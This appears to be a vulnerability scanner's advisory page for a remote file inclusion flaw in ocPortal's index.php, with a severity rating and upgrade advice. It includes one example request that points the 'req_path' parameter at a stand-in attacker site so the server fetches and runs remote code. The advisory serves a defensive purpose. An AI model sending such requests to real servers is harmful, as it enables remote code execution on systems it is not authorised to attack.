|
Family: CGI abuses --> Category: infos
ocPortal Remote File Include Vulnerability Scan
Vulnerability Scan Summary Acertains if ocPortal can include third-party files
Detailed Explanation for this Vulnerability Test
The remote host is running ocPortal, a content management system
written in PHP.
There is a bug in the remote version of this software which may allow
a possible hacker to execute arbitrary commands on the remote host by using
a file inclusion bug in the file 'index.php'.
A possible hacker may execute arbitrary commands by requesting :
http://www.example.com/index.php?req_path=http://[evilsite]/
which will make the remote script include the file 'funcs.php' on the remote
site and execute it.
Solution : Upgrade the newest version of this software
Threat Level: High
Click HERE for more information and discussions on this network vulnerability scan.
|